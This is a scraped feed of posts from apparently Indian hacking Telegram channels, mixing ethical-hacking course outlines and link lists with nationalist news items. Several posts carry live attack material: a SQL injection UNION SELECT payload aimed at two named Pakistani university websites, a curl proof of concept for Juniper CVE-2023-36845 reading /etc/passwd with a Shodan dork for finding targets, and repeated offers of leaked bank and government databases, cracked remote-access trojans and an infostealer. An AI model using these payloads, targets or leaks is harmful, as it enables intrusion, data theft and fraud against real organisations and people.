(FREE) Complete Ethical Hacking Training 15+ Hours by whitesec cyber security consultancy and Trainings.course topics -00:00:00 Note follow the Process 00:00:26 Introduction 7:06 Types of Hackers 15:47 what are the key concept of ethical hacking 26:55 Difference Between Blackhat vs whitehat 33:28 What Problem does ethical hackers identify 38:24 limitations of ethical hacking44:55 Installing Vmware and Downloding kali linux 46:30 Setuping Kali Linux 58:36 What is FootPrinting 1:07:58 What is Passive Information Gathering 1:16:41 What is Active Information Gathering 1:25:30 How to Perform FootPrinting 1:38:26 How to Perform google Hacking 2:17:11 How to Perform Footprinting Through Shodan 2:31:02 Footprinting censys and whois 2:41:20 Website FootPrinting using Wappalyzer and Netcraft 2:53:45 Finding subdomains 3:29:25 Extracting Website Links 3:34:41 Gathering Information of SSL Certificate 3:44:44 Email FootPrinting 3:52:04 What is Network Scanning 4:00:05 Scanning Network Using Nmap 4:11:18 How to Perform enumeration on ftp ssh telnet smtp 4:24:28 Vulnerability Scanning using nmap 4:27:43 Vulnerability scanning on websites 4:32:04 cracking windows passwords 4:45:35 How to Perform Steganography 4:56:57 what is malware 5:20:24 Trojan keylogger ransomware virus practically 5:42:19 social Engineering - Using Premade Web Template for Phishing 5:45:33 Social Engineering Site Cloning 5:48:18 Adapter for wifi hacking 5:49:35 wifi hacking 5:57:06 windows hacking and penetration testing 5:58:07 Introduction to Windows Hacking and Penetration testing and setting up lab 6:17:53 Scanning Network 6:23:32 checking live machines in Network 6:29:00 Scanning OS and about TTL 6:33:25 About Nmap and Open Ports 6:42:38 service version detection and exploits6:45:30 How to detect firewall 6:47:38 How to Bypass Firewall 6:49:38 About Fragmentation How its work 6:53:33 What is syn scan and How to perform it 7:02:18 How to Perform Nmap Scan using Different ips (Explanation) 7:10:54 (Practical)How to Perform ip spoofing or using Different ips to Perform Nmap Scanning 7:15:36 Enumeration using Nmap(Explanation) 7:24:30 How to Perform Enumeration (Practically) 7:36:58 How to Perform Vulnerability Scanning Using Nmap 7:45:11 About Metasploit 7:56:03 About MSFvenom 8:01:04 65.Generating Encoded Payload Using Metasploit 8:09:28 MSF console setting up Connection 8:19:20 About Privilege Escalation 8:31:43 Examples Of Privilege Escalation 8:36:45 How to Perform Privilege Escalation 8:43:42 About Eternalblue Vulnerability 8:51:48 what is external and internal network 8:56:32 About Eternalblue Vulnerability-29:02:16 Exploiting Eternalblue vulnerability 9:12:30 Exploiting Windows 7 and some important commands 9:24:40 setting up Persistence 9:45:48 privilege Escalation in windows 7 9:55:48 privilege Escalation in Windows 10 10:07:32 Persistence in windows 10 10:13:22 how to clear logs from victim machine 10:17:33 what is migration 10:24:14 Dumping windows Hashespart - 20:37 Dumping Windows Hashes From Memory6:36 Dumping Clear Text Password from windows14:45 cracking Hashes Using John the ripper27:43 injecting payload in real Application36:50 Setting Up shelter44:01 How to Generate Advance Payload Using Veil Framework57:56 Compile Veil Python file to exe1:14:40 How to implement this Attacks in real world1:22:25 Advance Red team training1:44:51 Android Hacking and important notice1:47:34 How to Setup ngrok1:56:47 Live Android Remote Access2:02:32 How to Control Android2:07:38 installing Ngrok in kali Linux2:09:25 How to Setup Fatrat2:22:56 Generating Payload using Fatrat2:34:35 Setting up Rapid Payload and generating payload2:46:26 Advance android hacking course3:13:57 Kali Linux hackingTraining Link 👇👇part - 1 https://youtu.be/w_oxcjPOWos?si=eD8BmJ1Poy54eHdapart - 2 https://youtu.be/kAShcvzb7wU?si=3KbAyfdPCTK430mA
2023-09-28 07:04:36
BREAKING: Bhartiya hackers hacked Canadian military website.A screenshot showed an error page with the message '#f—canada'.https://www.telegraph.co.uk/world-news/2023/09/27/indian-hackers-attack-canadian-website-sinjar-trudeau/#:~:text=Hackers%20calling%20themselves%20the%20Indian,www.forces.ca%20website.https://twitter.com/_treeni/status/170728453342570919 Images
2023-09-28 05:49:18
𝗖𝗩𝗘-𝟮𝟬𝟮𝟯-𝟬𝟭𝟮𝟲 𝗣𝗿𝗲-𝗮𝘂𝘁𝗵𝗲𝗻𝘁𝗶𝗰𝗮𝘁𝗶𝗼𝗻 𝗣𝗮𝘁𝗵 𝘁𝗿𝗮𝘃𝗲𝗿𝘀𝗮𝗹 𝘃𝘂𝗹𝗻𝗲𝗿𝗮𝗯𝗶𝗹𝗶𝘁𝘆 𝗶𝗻 𝗦𝗠𝗔𝟭𝟬𝟬𝟬😎🔥Link: https://twitter.com/thecybertix/status/1707268135907475495?t=o2AtY0lW2VPX9s3Qgfgy_g&s=19
2023-09-28 04:37:54
Shaheed Bhagat Singh Janamdin Images
2023-09-28 03:08:29
CrackCodes 🇮🇳 pinned «🕸Black Wallpaper HD Background App Data Leak : Download 🪬PlayTube CVE-2023-4714 Exploit : Check 🐸PaperCut NG CVE-2023-4568 Exploit : Check 📌Prestashop CVE-2023-39677 Exploit : Check 📍Microsoft SharePoint: CVE-2023-29357 Exploit : Check 🐲Cisco CVE-2023…»
2023-09-28 03:03:24
🕸Black Wallpaper HD Background App Data Leak : Download🪬PlayTube CVE-2023-4714 Exploit : Check🐸PaperCut NG CVE-2023-4568 Exploit : Check📌Prestashop CVE-2023-39677 Exploit : Check📍Microsoft SharePoint: CVE-2023-29357 Exploit : Check🐲Cisco CVE-2023-20209 Exploit : Check📯Elasticsearch Exploit-CVE-2023-31419 : Check🪅Chinese Maoxin Database Leak : Download👾📟NSA Equation Group Hacking Tools Leaked : Download
2023-09-27 22:42:14
Top Coding Challenge Websites to improve your skills.• LeetCode🔗 leetcode.com• Codewars🔗 codewars.com• HackerRank🔗 hackerrank.com• CodeChef🔗 codechef.com• iCodeThis🔗 icodethis.com• Frontend Mentor🔗 frontendmentor.io• playCSS🔗 playcss.app• Coderbyte🔗 coderbyte.com• CodinGame🔗 codingame.com
2023-09-27 22:37:08
Telegram Search EngineSearch for Channels, Bots & Groups.xtea.io/ts_en.html#cybersecurity #infosec #OSINT
2023-09-27 18:32:15
Here are some YouTube videos on hacking beginners to advanced roadmap tutorials:* [the hacker’s roadmap (how to get started in IT in 2023)](http://www.youtube.com/watch?v=uTAaFExLgwQ) by NetworkChuck* [How To Become A Hacker In 2023 | Step By Step Guide For Beginners](http://www.youtube.com/watch?v=W6vcd2gJw3Q) by Tech Xpress* [Introduction to Hacking | How to Start Hacking](http://www.youtube.com/watch?v=SkfxL_We8ro) by PhD Security* [Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 1)](http://www.youtube.com/watch?v=3FNYvj2U0HM) by The Cyber Mentor* [How To Become Ethical Hacker In 2023 | Ethical Hacking Roadmap | All About Hacking | Simplilearn](http://www.youtube.com/watch?v=7tWpzMtR5pQ) by SimplilearnI hope these videos help you on your journey to becoming a hacker!http://googleusercontent.com/youtube_content/5
2023-09-27 08:37:53
Government Graduate College Sahiwal ( PKUNIVERSITY OF SAHIWAL ( PKTaregt:1-http://www.gpgcs.edu.pk/alumni_profile_details.php?alumni_id=7[SQLi]2-https://www.uosahiwal.edu.pk/press.php?id=2[SQLi]Demo:http://www.gpgcs.edu.pk/alumni_profile_details.php?alumni_id=-7+Union+Select+1,2,3,4,database(),6,7,8,9,10,11,version(),13,14,15--+#hacker_bano_chutiya_nhe ❤️ #pkmc_ontop 🔥
2023-09-27 06:54:11
OSINT TIP #221 📽️HeygenLabs - instant AI video translation, using a natural voice clone and authentic speaking style! looks cool, try it yourself! @HeyGen_Official🔗 labs.heygen.com/video-translateRemember OPSEC 😉tft: @StuartJRitchie 👏#OSINT #AI #CyberSecurity
2023-09-27 06:22:56
https://github.com/saisathvik1/OSCP-Cheatsheet
2023-09-27 04:48:01
𝟮𝟮𝟱𝟬 $ 𝗕𝗼𝘂𝗻𝘁𝘆 🤑𝗙𝗼𝗿 𝗦𝗦𝗥𝗙 𝗩𝘂𝗹𝗻𝗲𝗿𝗮𝗯𝗹𝗶𝗹𝗶𝘁𝘆𝗩𝗶𝗱𝗲𝗼 𝗣𝗼𝗖:https://youtu.be/vtNYj157TUY?si=2BR38wEe5QHuwqUP
2023-09-26 18:03:14
1⃣ Part ⌨️0️⃣ Only 1⃣
2023-09-26 18:03:13
🛒 Part ⌨️ To 9️⃣ ✅➡️ Don't Forget To React ✅
2023-09-26 18:03:12
#⃣ Complete Ethical Hacking Bootcamp : Zero to Mastery #⃣⏱ 26 Hours 📦 232 LessonsLearn Ethical Hacking + Penetration Testing from scratch and master the most modern ethical hacking tools and best practices for 2021! You will practice real techniques used by black hat hackers, then learn to defend against them.#⃣ Taught by: Andrei Neagoie & Aleksa Tamburkovski#⃣ FULL COURSE UPLODED BELOW #⃣ Images
2023-09-26 06:05:36
Another Part of SQL Injection🔥𝗦𝗤𝗟 𝗜𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 𝗔𝘂𝘁𝗵 𝗕𝘆𝗽𝗮𝘀𝘀𝗧𝗼𝗽𝗶𝗰𝘀 𝗖𝗼𝘃𝗲𝗿𝗲𝗱:𝟭. Authentication Basics 𝟮. Code Review of the Vulnerability😨𝟯. Practically Bypassing Authentication with SQL Vulnerability. 𝗣𝗹𝗲𝗮𝘀𝗲 𝗟𝗶𝗸𝗲 & 𝗦𝘂𝗯𝘀𝗰𝗿𝗶𝗯𝗲 𝘁𝗼 𝗼𝘂𝗿 𝗬𝗼𝘂𝗧𝘂𝗯𝗲 𝗰𝗵𝗮𝗻𝗻𝗲𝗹 𝗳𝗼𝗿 𝗠𝗼𝗿𝗲 𝗦𝗤𝗟 𝗶𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 𝗧𝗼𝗽𝗶𝗰. 🙏🏻😊𝗟𝗶𝗻𝗸:https://youtu.be/sEfpho_YlzI?si=hvhkvi1Iw-kuc9w4
2023-09-25 11:56:13
Porkis 🐖 hacks 🐷Porkis 🤣https://x.com/NoiseAlerts/status/1706266578491416840
2023-09-25 08:16:36
Azure RDP AvailableAt pocket friendly PriceRAM 4GBValidity 1 MonthContact @indexfucker
2023-09-25 07:55:07
This channel/community aims to provide free courses related to programming,web development, cyber security, ethical hacking and many more tech related stuff and news #programmming, #coding, #ethicalhacking #cybersecurityJoin our channel channel :- telegram.me/cybertrickzone@cybertrickzone for more to learn hacking, programming, hacking tools, pdf , courses, tech news, database daily updates. Please join my channel
2023-09-25 07:52:33
FULL ETHICAL HACKING COURSE Download Link 🖇 - https://mega.nz/folder/a1BABBYS#ddX8ogxpECE1PqepSdzmVwDecryption Key: ddX8ogxpECE1PqepSdzmVw
2023-09-25 06:04:00
Another Part of SQL Injection🔥𝗦𝗤𝗟 𝗜𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 𝗔𝘂𝘁𝗵 𝗕𝘆𝗽𝗮𝘀𝘀𝗧𝗼𝗽𝗶𝗰𝘀 𝗖𝗼𝘃𝗲𝗿𝗲𝗱:𝟭. Authentication Basics 𝟮. Code Review of the Vulnerability😨𝟯. Practically Bypassing Authentication with SQL Vulnerability. 𝗣𝗹𝗲𝗮𝘀𝗲 𝗟𝗶𝗸𝗲 & 𝗦𝘂𝗯𝘀𝗰𝗿𝗶𝗯𝗲 𝘁𝗼 𝗼𝘂𝗿 𝗬𝗼𝘂𝗧𝘂𝗯𝗲 𝗰𝗵𝗮𝗻𝗻𝗲𝗹 𝗳𝗼𝗿 𝗠𝗼𝗿𝗲 𝗦𝗤𝗟 𝗶𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 𝗧𝗼𝗽𝗶𝗰. 🙏🏻😊𝗟𝗶𝗻𝗸:https://youtu.be/sEfpho_YlzI?si=hvhkvi1Iw-kuc9w4
2023-09-24 13:31:09
🪬ChinaPost-Track Data Leak : Download📟HTTP-Shell: MultiPlatform HTTP Reverse Shell : Download🕸DorXNG: Next Generation DorX : Download🐲Evilginx3 Phishlets : Download👾CVE-2023-0099 Exploit : Simple Urls < 115 - Reflected XSS : Download🧮Wave Hill Data Leak : Download🌚Research Institute for Islamic Culture and Thought Data Leak : Download
2023-09-24 08:08:51
IF Anyone Found Any Indian Data Seller And Buyer Plz Ping Me In my Dm @mynk0x00 Example:Username | SellerOrUsername | BuyerAnd Request To India Nationalist Don't Buy And Sell India Databases.Thank You 🧡
2023-09-23 13:09:35
Cheap And Free Hosting Sites FlokiNET - http://flokinet.is | https://billing.flokinet.isGearHost - https://www.gearhost.comDarkHost - https://darkhost.proiFastNet - https://ifastnet.comVPN NET - https://www.vpsnet.com/enVernalWeb - https://www.vernalweb.com | https://clients.vernalweb.com000WebHost - http://www.000webhost.comDreamHost - https://www.dreamhost.com | https://mbsy.coHostWinds - https://www.hostwinds.comHostSailor - https://hostsailor.com | https://clients.hostsailor.comKnownSRV - https://knownsrv.comEuServr - https://euservr.com | https://euservr.comHost22 - https://bit.ly/host_directVirtono - https://www.virtono.comHostSpicy - https://hostspicy.comRedSwitches - https://redswitches.com | https://dedicated.redswitches.comWebCare360 - https://webcare360.com | https://my.webcare360.comVPS9 - https://vps9.netBanaHosting - https://banahosting.com | https://manage.banahosting.comWebnode - http://webnode.comHostPixel - https://hostpixel.bizJetHost PRO - https://jethostpro.comKatxe - https://client.katxe.catRealhost Argentina - https://clientes.realhost.com.arSydneyICT - https://www.sydneyict.net.auOrangeWebsite - https://orangewebsite.comCheapHostingBD - http://cheaphostingbd.com | https://bill.cheaphostingbd.comInternoc24 - http://www.internoc24.host | https://my.internoc24.hostContabo - http://contabo.comAwardspace - https://www.awardspace.comAtspace - https://www.atspace.comHostSlick - https://hostslick.comFree Hosting EU - https://www.freehostingeu.comGeocities - http://www.geocities.wsMiarroba - https://miarroba.comTekcities - http://tekcities.com50Webs - https://www.50webs.comFateBack - http://www.fateback.comHostDZire - https://hostdzire.comNjalla - https://njal.laLeadHoster - https://leadhoster.comAgilityHoster - https://agilityhoster.comCurHost - https://curhost.comOption123 - https://option123.net
2023-09-23 04:54:44
⚡Made In India Internet browser "Veera" launched.Arjun Ghose, Founder of Veera, said "Our mission was to craft a faster, safer and private browsing sanctuary for Indian internet users."🔸Few features :1⃣Ad-Free Browsing: No annoying third-party ads.2️⃣ Enhanced Security: Blocks trackers for a safer online experience.3️⃣ Localized Content: Enjoy tailored content that matters to you.4️⃣ Introducing Kavach: Your privacy shield against online trackers. Images
2023-09-23 04:15:35
None
2023-09-22 14:30:48
⚠️ALERT⚠️ VERY SERIOUS ISSUEPLEASE PURA SUNNA OR AGAR AAP LOG ESA KAR RHE HO TO AAJ HI CHOR DO BHAGWAN KRE ESA APKE SATH NA HO..
2023-09-22 13:05:17
After Kashmir, mole found in Kerala A police officer in Kerala has connections to terrorists; SI Rijumon, a cyber cell officer, leaked highly confidential information to terrorists linked to ISIS!ISIS terrorists are becoming more active in Kerala. It has been reported that SI Rijumon from the cyber cell has been suspended for links to terrorism in Kottayam.The suspension occurred after the NIA discovered that he had shared confidential information with terrorist organizations. The terrorists who were recently arrested in Chennai were found to have ties to Rijumon. As a result, the NIA instructed the Kerala Police to suspend him promptly.This is not the first time that infiltration of the PFI in the Kerala police force has come to the fore. Many years ago, intelligence reports suggested radicalization and pointed to a WhatsApp group of police officers called the Pacha Velicham (Green Light). It is suspected that sections of the Communist regime also use this group to carry out the party agenda Images
2023-09-22 11:45:56
✅ Watch Free Netflix Trick Working || 2023 Smoothly ✅❤️ View -: https://netflixmirror.comIts Paid But Now Free!!Give Some Reaction 💯
2023-09-21 17:25:48
🇦🇿Google Dorks For Penetration Testing🇦🇿👺How is Google dorking used by hackers?:-Hacker utilize Google Dorks to uncover exposed data for example log files with usernames and passwords or cameras, etc.
2023-09-20 11:20:46
CrackCodes 🇮🇳 pinned «💩National Bank of Porkistan Data Leak : Download 🐷National Assembly of Porkistan Data Leak : Download 🐲Oschad Bank of Ukraine Data Leak : Download 🕸WAF Bypass Tool : Explore 🐀Remcos Rat 3.8.0 Cracked (Clean) : Download 👾CVE-2023-0255 Mass Exploit WordPress…»
2023-09-20 11:20:06
List of Cryptography Tools used in CTFs : Decoder 1: www.dcode.fr/symbols-ciphersDecoder 2: cryptii.comDedcoder 3: gchq.github.io/CyberChefDecoder 4:  crackstation.netRot Decoder: theblob.org/rot.cgiTwin Hex: www.calcresult.com/misc/cyphers/twin-hex.html
2023-09-20 10:11:54
Juniper J-Web - Remote Code Execution 🔥 - CVE-2023-36845Nearly 14,000 Juniper devices are affected, as a search on Shodan shows:Dork : title:"Juniper" http.favicon.hash:2141724739Poc:curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0'Here is a vulnerability scanner that has been specially developed to spot this vulnerability or you can also use Nuclei:https://lnkd.in/gEQrmXevFor more information:https://lnkd.in/gRP3uXTm #hacker_bano_chutiya_nhe
2023-09-20 08:40:24
🚀 Exciting News! Introducing NeplixFile 📂Tired of endless searches for files? NeplixFile is here to save the day! 🌟🔍 NeplixFile - Your Ultimate File Search Engine 📚🎥Say goodbye to endless searching and hello to effortless access! NeplixFile is your go-to solution for finding files like courses, ebooks, movies, and more in a snap. 🚀✨ Key Features:🔎 Lightning-fast search capabilities📚 Access to a treasure trove of resources🎉 Completely FREE!Experience the power of NeplixFile today! 🚀 Visit https://file.neplix.stream and simplify your file-finding journey. 🌐
2023-09-20 07:18:24
The Pakistani government has advised all sectors to avoid using AI products and services of Indian origin. The fintech sector, including some banks, in Pakistan has been collaborating with Indian-origin companies that offer IT products, cyber security, and AI solutions. Two years ago, a US company called Exodus Intelligence claimed that India had used security vulnerabilities to spy on Pakistan and China. Additionally, in 2020, Pakistani intelligence agencies discovered a significant security breach in which Indian hackers targeted the phones and devices of government officials and military personnel.
2023-09-20 02:33:09
💩National Bank of Porkistan Data Leak : Download🐷National Assembly of Porkistan Data Leak : Download🐲Oschad Bank of Ukraine Data Leak : Download🕸WAF Bypass Tool : Explore🐀Remcos Rat 3.8.0 Cracked (Clean) : Download👾CVE-2023-0255 Mass Exploit WordPress < Enable Media Plugin : Download🪬Fortinet Ssl Vpn Bruteforce : Explore@Crackcodes | System32.ink | Crackcodes.in
2023-09-19 16:02:02
🧮ActMobile Networks Data Leak : Download🐲Invicta Stealer: A Powerful, Native Stealer : Download📟GoTTY – Share Your Terminal As A Web Application : Explore👾JPGtoMalware : Try💌Heart Sender V4.00.33 Crack : Download @Crackcodes | Crackcodes.in | System32.ink
2023-09-19 15:00:35
"Today Bharat has reached the Moon, the G20 meeting is being held in Bharat, and Pakistan is begging countries around the world for a billion dollars"- Riyasat-e-Madina Pakistan's ex PM Nawaz Sharif.
2023-09-19 08:27:02
CDI TEAM ON WHATSAP CHANNELIN THIS CHANNEL WE WILL PROVIDE YOU GUYS👉🏻 CODING TUTORIALS AND HACKING TUTORIALS👉🏻 WEBINARS 👉🏻 GIVEAWAYS AND TIPS AND TRICKS👉🏻 HANDWRITTEN NOTES AND MANY MORE STUFF...LINK : https://whatsapp.com/channel/0029Va9JObd7j6gBzbQybW3rDON'T FORGET TO SHARE IT WITH YOUR FRIENDS❤️ JAY SHREE RAAM ❤️ Images
2023-09-19 04:45:52
𝗖𝘆𝗯𝗲𝗿𝘁𝗶𝘅, Wishing you a 𝙃𝙖𝙥𝙥𝙮 𝙂𝙖𝙣𝙚𝙨𝙝 𝘾𝙝𝙖𝙩𝙪𝙧𝙩𝙝𝙞🙏🏻✨💐🚩 Images
2023-09-18 21:33:00
Happy Ganesh Chaturthi To Everyone ❤️ Images
2023-09-18 21:05:23
🔴 USEFUL WEBSITES FOR PENTESTERS & HACKERS ➕Exploits Database 🔕http://www.exploit-db.com/http://www.intelligentexploit.comhttp://www.shodanhq.com/http://packetstormsecurity.com/Vulnerabilities Database 🏹https://cve.mitre.org/cve/http://www.cvedetails.com/https://nvd.nist.gov/http://osvdb.org/https://www.kb.cert.org/vuls/https://secunia.com/community/advisories/search/http://www.securityfocus.com/bidhttp://lwn.net/Vulnerabilities/http://denimgroup.com/resources-threadfix/http://www.vulnerability-lab.comhttp://www.secdocs.org/Hacking Tutorials 💻https://www.offensive-security.com/http://www.kalitutorials.net/2013/08/kali-linux.htmlhttps://www.youtube.com/user/DEFCONConferencehttps://www.youtube.com/user/Hak5Darrenhttps://www.youtube.com/user/sansinstitutehttps://en.wikibooks.org/wiki/Metasploit/VideoTutorialshttp://www.hacking-tutorial.com/http://breakthesecurity.cysecurity.org/http://www.securitytube.net/http://www.ehacking.net/https://vimeo.com/channels/fullscopesecurityhttp://www.spacerogue.net/wordpress/Virus Scan 👁‍🗨https://www.virustotal.com/nl/http://anubis.iseclab.org/http://virusscan.jotti.org/it--Not distribute to AV--http://v2.scan.majyx.net/?page=homehttp://fuckingscan.me/https://anonscanner.com/http://nodistribute.com/http://www.file2scan.net/Tools Download 🛠http://tools.kali.org/tools-listinghttp://insecure.org/http://www.hackersonlineclub.com/hacking-toolshttps://www.concise-courses.com/hacking-tools/http://www.darknet.org.uk/category/hacking-tools/http://www.kitploit.com/http://www.toolswatch.org/http://www.blackarch.org/tools.htmlhttps://pentest-tools.com/reconnaissance/google-hackinghttps://gexos.github.io/Hacking-Tools-Repository/http://www.romhacking.net/utilities/Network Online Tools 🌐http://www.yougetsignal.com/http://www.dnswatch.info/http://www.nirsoft.net/countryip/http://www.tcpiputils.com/http://www.coffer.com/mac_find/http://bgp.he.net/http://www.sockets.com/services.htmhttp://services.ce3c.be/ciprg/IP Lookup 🔍http://ip-api.com/#http://www.my-ip-neighbors.com/http://www.whatismyip.com/http://www.ip2location.com/demohttp://freegeoip.net/static/index.htmlhttp://whatstheirip.comhttp://ipaddress.comhttp://www.ip-adress.com/ipaddresstolocation/Encrypt / Decrypt ✈️http://crypo.in.ua/tools/http://www.tools4noobs.com/online_tools/decrypt/http://codebeautify.org/encrypt-decrypthttp://textmechanic.com/Encryption-Generator.htmlhttp://www.yellowpipe.com/yis/tools/encrypter/Online Hash Crackers 💥http://www.hashkiller.co.uk/http://www.md5online.org/http://www.cmd5.org/http://www.md5crack.com/http://www.netmd5crack.com/cracker/http://md5decryption.com/http://md5.rednoize.com/http://www.md5this.com/index.phphttp://www.tydal.nu/article/md5-crack/http://passcracking.com/https://hdb.insidepro.com/enhttps://crackstation.net/http://www.cloudcracker.net/https://isc.sans.edu/tools/reversehash.htmlhttp://www.onlinehashcrack.com/ [$]http://hashcrack.in/en [$]File Upload 🕓https://mega.co.nz/https://www.mediafire.com/https://infotomb.com/m/welcomehttp://sharesend.com/http://www.wss-coding.com/uploadhttp://zippyshare.com/http://filetolink.com/http://ge.tt/http://largedocument.com/http://rghost.net/http://dox.abv.bg/files/sharehttp://secureupload.eu/Anonymous Test 👺https://ipleak.net/https://www.dnsleaktest.com/https://diafygi.github.io/webrtc-ips/Torcheck ✅http://5deqglhxcoy3gbx6.onion - Xenobitehttp://tmkloc6vhxos3nde.onionSMS 🏴‍☠️http://receive-sms-now.com/http://www.receive-sms-online.info/http://www.receivesmsonline.net/Fake Identity 🔡http://www.fakenamegenerator.com/https://fakena.me/http://names.igopaygo.com/people/fake_personPosted by 💎@TheGodEye💎
2023-09-18 16:15:41
CrackCodes 🇮🇳 pinned «🧮ActMobile Networks Data Leak : Download 🐲Invicta Stealer: A Powerful, Native Stealer : Download 📟GoTTY – Share Your Terminal As A Web Application : Explore 👾JPGtoMalware : Try 💌Heart Sender V4.00.33 Crack : Download @Crackcodes | Crackcodes.in | System32.ink»
2023-09-18 12:26:38
🧮ActMobile Networks Data Leak : Download🐲Invicta Stealer: A Powerful, Native Stealer : Download📟GoTTY – Share Your Terminal As A Web Application : Explore👾JPGtoMalware : Try💌Heart Sender V4.00.33 Crack : Download @Crackcodes | Crackcodes.in | System32.ink
2023-09-18 05:38:02
𝗦𝗤𝗟 𝗜𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 - 𝗕𝗔𝗦𝗜𝗖𝗦𝗧𝗼𝗽𝗶𝗰𝘀 𝗖𝗼𝘃𝗲𝗿𝗲𝗱:𝟭. What is SQL? 𝟮. Explain Practically how SQL Works 😉𝟯. What is SQL Injection? 𝟰. Practicing Basic SQL Injection. 𝙍𝙚𝙨𝙤𝙪𝙧𝙘𝙚𝙨 𝙖𝙧𝙚 𝙖𝙙𝙙𝙚𝙙 𝙞𝙣 𝙩𝙝𝙚 𝘿𝙚𝙨𝙘𝙧𝙞𝙥𝙩𝙞𝙤𝙣, 𝙨𝙤 𝙮𝙤𝙪 𝙘𝙖𝙣 𝙖𝙘𝙘𝙚𝙨𝙨 𝙞𝙩. Please Like & Subscribe to our YouTube channel for More info about 𝗦𝗤𝗟 𝗜𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻. 🙏🏻𝗟𝗶𝗻𝗸:https://youtu.be/WYQUO8LMDmY?si=u_PN82qLDKnGXGr-
2023-09-17 12:45:56
Congratulations Champions 🎉Bharat won the 8th Aisa CupJai Hind 🇮🇳 Images
2023-09-17 03:40:18
📟Xavier Marks Indonesian Data Leak : Download👾CVE-2023-34039 Exploit : Download🐲Craxs Rat V6.7 : Download🕸Invicti Standard V23.9.0.42095 Crack : Download🪅Telegram Bot For Remote Access To Computer Files : Download📯Get IP Address On Other Side Audio Call In Telegram : Download
2023-09-16 21:19:15
𝐑𝐞𝐝 𝐓𝐞𝐚𝐦 𝐓𝐨𝐨𝐥𝐬 🔥🔴 RECONNAISSANCE:- RustScan ==> https://lnkd.in/ebvRfBNy- NmapAutomator ==> https://lnkd.in/gu5wxzf6- AutoRecon ==> https://lnkd.in/g3DeG6YT- Amass ==> https://lnkd.in/e7V569N5- CloudEnum ==> https://lnkd.in/ePHDeGZv- Recon-NG ==> https://lnkd.in/edwaXFjS- AttackSurfaceMapper ==> https://lnkd.in/ebbcj6Rm- DNSDumpster ==> https://dnsdumpster.com/ 🔴 INITIAL ACCESS:- SprayingToolKit ==> https://lnkd.in/eBSAPz5z- o365Recon ==> https://lnkd.in/eJwCx-Ga- Psudohash ==> https://lnkd.in/gcaxV6fR- CredMaster ==> https://lnkd.in/gtMEDVuS- DomainPasswordSpray ==> https://lnkd.in/guWj4TYv- TheSprayer ==> https://lnkd.in/gZVuQYiv- TREVORspray ==> https://lnkd.in/gHgcbjgV 🔴 DELIVERY:- o365AttackToolKit ==> https://lnkd.in/etCCYi8y- EvilGinx2 ==> https://lnkd.in/eRDPvwUg- GoPhish ==> https://lnkd.in/ea26dfNg- PwnAuth ==> https://lnkd.in/eqecM7de- Modlishka ==> https://lnkd.in/eds-dR5C 🔴 COMMAND AND CONTROL:- PoshC2 ==> https://lnkd.in/eqSJUDji- Sliver ==> https://lnkd.in/ewN9Nday- SILENTTRINITY ==> https://lnkd.in/eeZGbYMs- Empire ==> https://lnkd.in/egAPa8gY- AzureC2Relay ==> https://lnkd.in/efmh2t3g- Havoc C2 ==> https://lnkd.in/gEFp2iym- Mythic C2 ==> https://lnkd.in/gnCGwfWk 🔴 CREDENTIAL DUMPING:- MimiKatz ==> https://lnkd.in/etEGfvJK- HekaTomb ==> https://lnkd.in/eJx5Ugu5- SharpLAPS ==> https://lnkd.in/eA28n9FT- Net-GPPPassword ==> https://lnkd.in/e3CTez5A- PyPyKatz ==> https://lnkd.in/eeb5b6Tz 🔴 PRIVILEGE ESCALATION:- SharpUp ==> https://lnkd.in/etR2Pe_n- MultiPotato ==> https://lnkd.in/eq53PXcJ- PEASS ==> https://lnkd.in/eWA66akh- Watson ==> https://lnkd.in/eZfYMSMX- Bat-Potato ==> https://lnkd.in/gjziyG8q 🔴 DEFENSE EVASION:- Villain ==> https://lnkd.in/gquyGFm5- EDRSandBlast ==> https://lnkd.in/e8g8zYFT- SPAWN - Cobalt Strike BOF ==> https://lnkd.in/e223PbqZ- NetLoader ==> https://lnkd.in/ef5wCD4y- KillDefenderBOF ==> https://lnkd.in/eVd54HUp- ThreatCheck ==> https://lnkd.in/eHvSPakR- Freeze ==> https://lnkd.in/eNUh3zCi- GadgetToJScript ==> https://lnkd.in/egPQBBXJ 🔴 PERSISTENCE:- SharPyShell ==> https://lnkd.in/eXm8h8Bj- SharpStay ==> https://lnkd.in/erRbeFMj- SharpEventPersist ==> https://lnkd.in/e_kJFNiB 🔴 LATERAL MOVEMENT:- SCShell ==> https://lnkd.in/e256fC8B- MoveKit ==> https://lnkd.in/eR-NUu_U- ImPacket ==> https://lnkd.in/euG4hTTs 🔴 EXFILTRATION:- SharpExfiltrate ==> https://lnkd.in/eGC4BKRN- DNSExfiltrator ==> https://lnkd.in/epJ-s6gp- Egress-Assess ==> https://lnkd.in/eXGFPQRJ#redteam #cybersecurity #penetrationtesting #security #ethicalhacking #tools
2023-09-16 21:15:32
𝗙𝗥𝗘𝗘 (𝗚𝗼𝗼𝗴𝗹𝗲) 𝗖𝗼𝘂𝗿𝘀𝗲𝘀 𝘆𝗼𝘂 𝘄𝗶𝗹𝗹 𝗿𝗲𝗴𝗿𝗲𝘁 𝗻𝗼𝘁 𝘁𝗮𝗸𝗶𝗻𝗴 𝗶𝗻 𝟮𝟬𝟮𝟯.1. Google Project Management🔗https://lnkd.in/deM4-ATJ2. Agile Project Management🔗https://lnkd.in/dzBGr4Xp3. Project Execution: Running the Project🔗https://lnkd.in/dB5aZ4Fn4. Foundations of Project Management🔗https://lnkd.in/dGkjks2x5. Project Initiation: Starting a Successful Project🔗https://lnkd.in/d_NzEpaH6. Project Planning: Putting It All Together🔗https://lnkd.in/dF2BP4uA7. Google Analytics for Power Users🔗https://lnkd.in/dhPzZYKu8. Fundamentals of digital marketing🔗https://lnkd.in/dBS58kFc9. Python Basics for Data Analysis🔗https://lnkd.in/dsihXekD10. Data Science Foundations🔗https://lnkd.in/dRNWbj_r11. Advanced Google Analytics🔗https://lnkd.in/dMpbPc_h14. Google Cloud Computing Foundations:🔗https://lnkd.in/duxCQG7X15. Data, ML, and AI in Google Cloud🔗https://lnkd.in/dx3YJ7HG17. Machine Learning Crash 